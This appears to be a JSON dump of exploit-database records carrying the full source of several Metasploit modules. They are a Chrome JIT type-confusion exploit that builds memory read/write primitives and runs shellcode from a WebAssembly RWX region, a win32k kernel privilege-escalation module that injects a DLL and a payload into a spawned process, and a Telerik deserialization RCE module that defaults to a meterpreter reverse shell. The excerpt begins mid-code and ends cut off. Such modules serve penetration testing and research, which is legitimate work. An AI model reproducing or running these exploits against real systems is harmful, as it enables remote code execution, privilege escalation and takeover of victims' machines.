o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(div_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n}\n\npwn();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n^\n\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": "2020-12-10T22:35:11", "description": "This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. The payload is executed within the rwx region of the sandboxed renderer process. This module can target the renderer process (target 0), but Google Chrome must be launched with the --no-sandbox flag for the payload to execute successfully. Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. Additionally the exploit can cause the target machine to restart when the session is terminated. A BSOD is also likely to occur when the system is shut down or rebooted.\n", "published": "2020-02-14T22:10:52", "type": "metasploit", "title": "Google Chrome 67, 68 and 69 Object.create exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-12-07T11:02:10", "id": "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::Remote::HttpServer\n include Msf::Payload::Windows::AddrLoader_x64\n include Msf::Payload::Windows::ReflectiveDllInject_x64\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process.\n This module can target the renderer process (target 0), but Google\n Chrome must be launched with the --no-sandbox flag for the payload to\n execute successfully.\n Alternatively, this module can use CVE-2019-1458 to escape the renderer\n sandbox (target 1). This will only work on vulnerable versions of\n Windows (e.g Windows 7) and the exploit can only be triggered once.\n Additionally the exploit can cause the target machine to restart\n when the session is terminated. A BSOD is also likely to occur when\n the system is shut down or rebooted.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx', 'linux'],\n 'DefaultTarget' => 0,\n 'Targets' => [\n [\n 'No sandbox escape (--no-sandbox)', {}\n ],\n [\n 'Windows 7 (x64) sandbox escape via CVE-2019-1458',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'DefaultOptions' => { 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate' }\n }\n ],\n ],\n 'DisclosureDate' => '2018-09-25'\n )\n )\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information during exploitation', false]),\n ])\n deregister_options('DLL')\n end\n\n def library_path\n File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-1458', 'exploit.dll')\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status('[*] ' + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n download_payload = ''\n shellcode = payload.encoded\n uripath = datastore['URIPATH'] || get_resource\n uripath += '/' unless uripath.end_with? '/'\n\n if target.name.end_with?('CVE-2019-1458')\n if request.uri.to_s.end_with?('/payload')\n loader_data = stage_payload\n pidx = loader_data.index('PAYLOAD:')\n if pidx\n loader_data[pidx, payload.encoded.length] = payload.encoded\n end\n loader_data += \"\\0\" * (0x20000 - loader_data.length)\n send_response(cli, loader_data, {\n 'Content-Type' => 'application/octet-stream',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n print_good(\"Sent stage2 exploit (#{loader_data.length.to_s(16)} bytes)\")\n end\n loader = generate_loader\n shellcode = loader[0]\n shellcode_addr_offset = loader[1]\n shellcode_size_offset = loader[2]\n download_payload = <<-JS\n var req = new XMLHttpRequest();\n req.open('GET', '#{uripath}payload', false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n if (req.status != 200) {\n return;\n }\n let payload_size = req.responseText.length;\n let payload_array = new ArrayBuffer(payload_size);\n let payload8 = new Uint8Array(payload_array);\n for (let i = 0; i < req.responseText.length; i++) {\n payload8[i] = req.responseText.charCodeAt(i) & 0xff;\n }\n let payload_array_mem_addr = memory.addrof(payload_array) + 0x20n;\n let payload_array_addr = memory.readPtr(payload_array_mem_addr);\n print('payload addr: 0x' + payload_array_addr.toString(16));\n uint64View[0] = payload_array_addr;\n for (let i = 0; i < 8; i++) {\n shellcode[#{shellcode_addr_offset} + i] = uint8View[i];\n }\n for (let i = 0; i < 4; i++) {\n shellcode[#{shellcode_size_offset} + i] = (payload_size>>(8*i)) & 0xff;\n }\n for (let i = 4; i < 8; i++) {\n shellcode[#{shellcode_size_offset} + i] = 0;\n }\n JS\n end\n\n jscript = <<~JS\n let ab = new ArrayBuffer(8);\n let floatView = new Float64Array(ab);\n let uint64View = new BigUint64Array(ab);\n let uint8View = new Uint8Array(ab);\n\n let shellcode = new Uint8Array([#{Rex::Text.to_num(shellcode)}]);\n\n Number.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n };\n\n BigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n };\n\n function hex(n) {\n return '0x' + n.toString(16);\n };\n\n function fail(s) {\n print('FAIL ' + s);\n throw null;\n }\n\n const NUM_PROPERTIES = 32;\n const MAX_ITERATIONS = 100000;\n\n function gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n }\n\n function make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n }\n\n function pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n #{download_payload}\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(el_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n }\n\n pwn();\n JS\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = <<~JS\n print = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n };\n JS\n\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(%r{//.*$}, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %(\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n)\n send_response(cli, html, {\n 'Content-Type' => 'text/html',\n 'Cache-Control' => 'no-cache, no-store, must-revalidate',\n 'Pragma' => 'no-cache', 'Expires' => '0'\n })\n end\n\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/chrome_object_create.rb"}, {"lastseen": "2021-01-15T19:11:44", "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability within win32k which occurs due to an uninitalized variable, which allows user mode attackers to write a limited amount of controlled data to an attacker controlled address in kernel memory. By utilizing this vulnerability to execute controlled writes to kernel memory, an attacker can gain arbitrary code execution as the SYSTEM user. This module has been tested against Windows 7 x64 SP1. Offsets within the exploit code may need to be adjusted to work with other versions of Windows. The exploit can only be triggered once against the target and can cause the target machine to reboot when the session is terminated.\n", "published": "2020-10-15T15:59:44", "type": "metasploit", "title": "Microsoft Windows Uninitialized Variable Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-1458"], "modified": "2020-12-07T11:02:10", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Windows Uninitialized Variable Local Privilege Elevation',\n 'Description' => %q{\n This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n to write a limited amount of controlled data to an attacker controlled address\n in kernel memory. By utilizing this vulnerability to execute controlled writes\n to kernel memory, an attacker can gain arbitrary code execution\n as the SYSTEM user.\n\n This module has been tested against Windows 7 x64 SP1. Offsets within the\n exploit code may need to be adjusted to work with other versions of Windows.\n The exploit can only be triggered once against the target and can cause the\n target machine to reboot when the session is terminated.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'piotrflorczyk', # poc\n 'unamer', # exploit\n 'timwr', # msf module\n ],\n 'Platform' => 'win',\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows 7 x64', { 'Arch' => ARCH_X64 }]\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS ],\n 'Reliability' => [ UNRELIABLE_SESSION ]\n },\n 'References' =>\n [\n ['CVE', '2019-1458'],\n ['URL', 'https://github.com/unamer/CVE-2019-1458'],\n ['URL', 'https://github.com/piotrflorczyk/cve-2019-1458_POC'],\n ['URL', 'https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/'],\n ['URL', 'https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html']\n ],\n 'DisclosureDate' => '2019-12-10',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'WizardOpium' ]\n )\n )\n register_options([\n OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])\n ])\n end\n\n def setup_process\n process_name = datastore['PROCESS']\n begin\n print_status(\"Launching #{process_name} to host the exploit...\")\n launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)\n process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe\n end\n\n file_path = expand_path('%WINDIR%\\\\system32\\\\win32k.sys')\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n build_num_gemversion = Gem::Version.new(\"#{major}.#{minor}.#{build}.#{revision}\")\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2019-12-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('6.0.6000.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20692')) # Windows Vista and Windows Server 2008\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24540')) # Windows 7 and Windows Server 2008 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.22932')) # Windows 8 and Windows Server 2012\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19574')) # Windows 8.1 and Windows Server 2012 R2\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18427')) # Windows 10 v1507\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.99999')) # Windows 10 v1511\n return CheckCode::Appears\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3383')) # Windows 10 v1607\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] != ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 32-bit systems is not supported')\n end\n\n process = setup_process\n library_data = exploit_data('CVE-2019-1458', 'exploit.dll')\n print_status(\"Injecting exploit into #{process.pid} ...\")\n exploit_mem, offset = inject_dll_data_into_process(process, library_data)\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2019_1458_wizardopium.rb"}, {"lastseen": "2021-01-15T19:13:38", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T17:48:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # 